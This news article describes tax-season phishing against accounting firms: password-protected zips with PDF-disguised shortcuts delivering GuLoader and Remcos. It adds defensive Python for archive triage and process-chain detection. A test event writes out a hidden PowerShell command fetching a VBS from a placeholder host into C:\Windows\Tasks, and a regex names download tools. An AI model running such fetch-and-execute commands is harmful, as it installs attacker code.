Tax season scams.
N2K, Apr 17, 2023

Hey, America--you've got until Tuesday to file your income tax returns. (And you're welcome to the reminder.) But be careful--the hoods know the deadline, too.

Tax season scams.

Tuesday, April 18th, is the day on which US income tax returns are due this year. The traditional April 15th filing deadline fell on a weekend, and the observance of Emancipation Day on Monday pushed the deadline back an additional day. Tax season is usually an occasion for a wide range of fraud, since it combines fear and greed (mostly fear, but some greed, too), emotions that tend to cloud the judgment and render people vulnerable to scams.

Spearphishing Tax Professionals. 

This year, however, a number of such scams have targeted victims who normally have more detachment than the harried and baffled taxpayers themselves. Sophos researchers, reporting on the eve of the US tax filing deadline, say criminals are conducting spearphishing campaigns against the tax professionals themselves.

“Financial accountant firms and CPAs are in the crosshairs this tax season, as a threat actor is targeting that industry with an attack that combines social engineering with a novel exploit against Windows computers to deliver malware called GuLoader,” Sophos writes. GuLoader is an unusually evasive shellcode-based downloader that can be used to infect compromised victims with follow-on attacks. 

In the come-on, the hoods represent themselves as potential customers inquiring whether the tax professionals receiving the email are taking on new clients:

“The attack begins with an email that purports to solicit business from the tax preparation firm. The initial message to the target is benign, with a subject line of Prospective Client Enquiries containing nothing more than an introduction and a request for information about ‘onboarding new clients.’ The email sender goes on to claim that ‘The CPA I used last year is retired, so here I am on the lookout for a new firm to work with.’”

That’s the first phase of a two-stage attack. Should the firm the criminals contact reply, “the sender then sends a follow-up email with a link to a password-protected Zip file hosted on a cloud storage service. The Zip archive has a filename that includes the last name of the fictitious person who purportedly sent the initial email message.” At least one of the files is benign chum, but chum the recipient is unlikely to be able to open, which will in all likelihood lead them to open the second file, “a Windows Shortcut (.LNK file) labeled with a PDF file suffix and with an icon that makes it appear to be a PDF document.” That’s the file that conceals the phish hook: “a shortcut command pulls down a Visual Basic script, drops it into the C:\Windows\Tasks folder, and executes it.” And a second command downloads some additional benign misdirection: “A second command appended to the first drops an actual PDF document (of someone’s IRS form W-2, 1099, or 1040) into the same location and opens it as well, as a decoy.”

The password protection on the zip file (the social engineers helpfully supply the password) is particularly useful to the attackers: email filters cannot inspect the contents of an encrypted archive, so the malicious shortcut inside it slips past them.
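The two traits described above, a password-protected archive that scanners cannot look inside and a Windows shortcut dressed up as a PDF, are both visible from the archive's metadata without the password. The following is an added example (not code from Sophos, Securonix, or the original article) of a small mail-gateway style triage check in Python's standard library. It reads the ZIP central directory for the "encrypted" general-purpose flag, flags `.lnk` entries and `X.pdf.lnk`-style double extensions (Explorer hides the `.lnk` suffix, so the user sees `X.pdf`), and, for entries it can read, checks for the ShellLink header. The sample archives, names, and a helper that merely sets the encrypted flag bit in a fixture (the data itself is not encrypted) are all constructed for this example.

```python
"""Triage an emailed zip for password-protected entries and disguised shortcuts.
Added example; standard library only. Sample archives below are constructed."""
import io
import struct
import zipfile

FLAG_ENCRYPTED = 0x0001                   # general-purpose bit 0 in ZIP headers
LNK_HEADER_SIZE = b"\x4c\x00\x00\x00"     # ShellLinkHeader.HeaderSize == 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # ShellLink CLSID, little-endian
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt"}
BLOCKING = {"shortcut", "shortcut-posing-as-document", "lnk-content"}


def is_shell_link(head: bytes) -> bool:
    """Content check: a Windows .LNK begins with HeaderSize 0x4C and the ShellLink CLSID."""
    return head[:4] == LNK_HEADER_SIZE and head[4:20] == LNK_CLSID


def classify_name(filename: str) -> list:
    """Name check: any .lnk is suspicious in mail; 'Name.pdf.lnk' is the lure pattern."""
    tokens = filename.rsplit("/", 1)[-1].lower().split(".")
    findings = []
    if tokens[-1] == "lnk":
        findings.append("shortcut")
        if len(tokens) >= 3 and tokens[-2] in DOCUMENT_EXTS:
            findings.append("shortcut-posing-as-document")
    return findings


def triage_archive(zip_bytes: bytes) -> dict:
    """Per-entry findings plus an overall verdict: 'block', 'review' or 'clean'."""
    entries = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            findings = classify_name(info.filename)
            if info.flag_bits & FLAG_ENCRYPTED:
                findings.append("encrypted")      # payload cannot be inspected without the password
            else:
                with zf.open(info) as fh:
                    if is_shell_link(fh.read(20)):
                        findings.append("lnk-content")
            entries[info.filename] = findings
    seen = set().union(*entries.values()) if entries else set()
    if seen & BLOCKING:
        verdict = "block"
    elif "encrypted" in seen:
        verdict = "review"                        # hold for an analyst; contents are opaque
    else:
        verdict = "clean"
    return {"entries": entries, "verdict": verdict}


def _mark_encrypted(zip_bytes: bytes) -> bytes:
    """Test-fixture helper: set the encrypted bit in every local (offset 6) and
    central (offset 8) header so the archive looks password-protected to a
    scanner. The stored data is left as-is; this is not real ZIP encryption."""
    buf = bytearray(zip_bytes)
    for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = buf.find(sig)
        while pos != -1:
            flags = struct.unpack_from("<H", buf, pos + off)[0] | FLAG_ENCRYPTED
            struct.pack_into("<H", buf, pos + off, flags)
            pos = buf.find(sig, pos + 4)
    return bytes(buf)


def build_sample(entries, password_protected=False) -> bytes:
    """Constructed fixture: zip (name, bytes) pairs, optionally flagged as encrypted."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in entries:
            zf.writestr(name, data)
    return _mark_encrypted(buf.getvalue()) if password_protected else buf.getvalue()


# Constructed samples modelled on the lure described in the text (no real malware inside).
LURE = build_sample([("Prospective_Client_Smith.pdf.lnk", b"placeholder"),
                     ("Smith_W2_2022.pdf", b"%PDF-1.4 decoy")], password_protected=True)
UNPROTECTED_LNK = build_sample([("invoice.lnk", LNK_HEADER_SIZE + LNK_CLSID + bytes(56))])
ENCRYPTED_ONLY = build_sample([("engagement_letter.pdf", b"%PDF-1.4")], password_protected=True)
CLEAN = build_sample([("engagement_letter.pdf", b"%PDF-1.4")])

if __name__ == "__main__":
    for label, sample in (("lure", LURE), ("unprotected lnk", UNPROTECTED_LNK),
                          ("encrypted only", ENCRYPTED_ONLY), ("clean", CLEAN)):
        print(label, triage_archive(sample))
```

The name and flag checks work on the central directory alone, which is exactly the metadata an attacker cannot hide behind a password; the content check only fires when the entry is readable. A gateway that cannot open an archive should treat "encrypted" as a reason to hold the message rather than as a reason to pass it.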

Securonix began publishing research into this particular threat as early as March, when they identified a campaign of phishing emails they tracked as Tactical#Octopus. "The Securonix Threat Research team has identified an ongoing hyper-targeted phishing campaign (tracked by Securonix Threat Research as TACTICAL#OCTOPUS) targeting individuals in the US using seemingly valid tax forms and contracts. Some of the lure documents observed contained employee W-2 tax documents, I-9, and real estate purchase contracts." The attack, which bundles the malicious phish hook in a password-protected zip file, proceeds in distinct stages. After the criminals initiate contact, they induce an initial infection: a "PowerShell one liner command that downloads the Visual Basic file." The next phase is VBS file execution, which in turn enables PowerShell execution, at which point they've achieved access to the victim's system.
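The staged chain described in the Sophos and Securonix reporting (a shortcut launches PowerShell to fetch a script, the script is dropped into C:\Windows\Tasks and run by the script host, and the script host in turn starts PowerShell) leaves a distinctive parent/child trail in process-creation telemetry. The following is an added example, not code from either vendor, of three detection rules applied to constructed events modelled loosely on Sysmon Event ID 1 fields (`Image`, `ParentImage`, `CommandLine`). The events, process IDs, host name and URL are all made up for the example; a real deployment would read them from the endpoint's event log.

```python
"""Detect the shortcut -> PowerShell download -> VBS in C:\\Windows\\Tasks -> PowerShell chain
over process-creation events. Added example; events below are constructed."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
TASKS_DIR = re.compile(r"c:\\windows\\tasks\\", re.IGNORECASE)
DOWNLOAD_HINTS = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b|\bwget\b", re.IGNORECASE)

RULE_DOWNLOAD = "shell-from-explorer-with-download"   # user double-clicked a lure, stage 1 fetch
RULE_TASKS = "script-run-from-windows-tasks"          # VBS executed from the drop folder
RULE_CHILD = "shell-spawned-by-script-host"           # VBS hands off to PowerShell
CHAIN = {RULE_DOWNLOAD, RULE_TASKS, RULE_CHILD}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list:
    """Return the rule names a single process-creation event matches."""
    image, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    hits = []
    if image in SHELLS and parent == "explorer.exe" and DOWNLOAD_HINTS.search(cmd):
        hits.append(RULE_DOWNLOAD)
    if image in SCRIPT_HOSTS and TASKS_DIR.search(cmd):
        hits.append(RULE_TASKS)
    if image in SHELLS and parent in SCRIPT_HOSTS:
        hits.append(RULE_CHILD)
    return hits


def analyze(events: list) -> dict:
    """Alerts per event, plus whether every stage of the chain was seen on the host."""
    alerts = []
    seen = set()
    for ev in events:
        hits = check_event(ev)
        if hits:
            alerts.append((ev["ProcessId"], hits))
            seen.update(hits)
    return {"alerts": alerts, "chain_observed": CHAIN <= seen}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WS = r"C:\Windows\System32\wscript.exe"
EX = r"C:\Windows\explorer.exe"

# Constructed telemetry for one host; the last two events are benign noise.
SAMPLE_EVENTS = [
    {"ProcessId": 4312, "Image": EX, "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 5120, "Image": PS, "ParentImage": EX,
     "CommandLine": 'powershell -w hidden -c "iwr https://storage.example.invalid/Smith.vbs '
                    '-OutFile C:\\Windows\\Tasks\\Smith.vbs"'},
    {"ProcessId": 5188, "Image": WS, "ParentImage": PS,
     "CommandLine": r"wscript.exe C:\Windows\Tasks\Smith.vbs"},
    {"ProcessId": 5204, "Image": PS, "ParentImage": WS,
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden"},
    {"ProcessId": 5300, "Image": r"C:\Program Files\Reader\AcroRd32.exe", "ParentImage": PS,
     "CommandLine": r"AcroRd32.exe C:\Windows\Tasks\Smith_W2.pdf"},      # decoy document opening
    {"ProcessId": 6000, "Image": WS, "ParentImage": EX,
     "CommandLine": r"wscript.exe C:\Users\cpa\Documents\backup.vbs"},  # ordinary admin script
]

if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for pid, hits in result["alerts"]:
        print(pid, ", ".join(hits))
    print("full chain observed:", result["chain_observed"])
```

Any one rule on its own is a reasonable alert; the value of correlating them is that the three stages together on one host are far less likely to be an administrator's own scripting than any single stage is. The decoy PDF being opened from C:\Windows\Tasks is deliberately left out of the rules so that the benign-looking event does not mask the chain that preceded it.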

It's a clever campaign. Securonix says that attribution is ambiguous, but that circumstantial evidence points to a Russian threat actor. "Two of three IP addresses identified in the attack were registered to Petersburg Internet Network Ltd. in the Russian Federation. This could indicate Russian origins, however the possibility of false flag operations cannot be ruled out at this point."

Remcos RAT is the common final payload.

Once they've phished their way into a foothold in the victims' systems, what are the threat actors going to do with their access? According to Microsoft, in most cases they're installing the Remcos remote access Trojan (RAT). Remcos, developed in 2016 and in malicious use since shortly after its introduction, enables the attacker to gain administrative privileges in Windows systems. Microsoft writes, "Successful delivery of a Remcos payload could provide an attacker the opportunity to take control of the target device to steal information and/or move laterally through the target network."

Advice on avoiding tax season attacks.

James McQuiggan, Security Awareness Advocate at KnowBe4, wrote to urge vigilance as tax season comes to a close:

"Tax season presents an excellent chance for cybercriminals to exploit unsuspecting tax professionals and taxpayers. It is crucial to stay vigilant and take necessary precautions to protect against these attacks. Users and organizations can reduce the risk of a data breach by being skeptical and cautious with emails, keeping software and systems up to date, and avoiding public Wi-Fi networks when accessing sensitive information. With all emails, when determining if the email is a potential phishing attempt, users will want to check for several items to verify the authenticity. These steps work towards developing new habits with email, and while they may not want to, it reduces the loss of data and damage to a user or organization.

"Check the sender's authenticity by checking their email address and making sure it matches the sender's organization, or whether it's a completely random email address. Avoid clicking on suspicious links, which may direct you to a malicious site. If the user needs clarification, there are free online services where you can copy and paste the link into their tool, and they can determine if it's malicious or not. Users can protect themselves against the tax season style of phishing emails and help prevent their personal information from falling into the hands of cybercriminals. Being cautious, with a healthy level of skepticism, and taking the necessary precautions is the best defense against these attacks."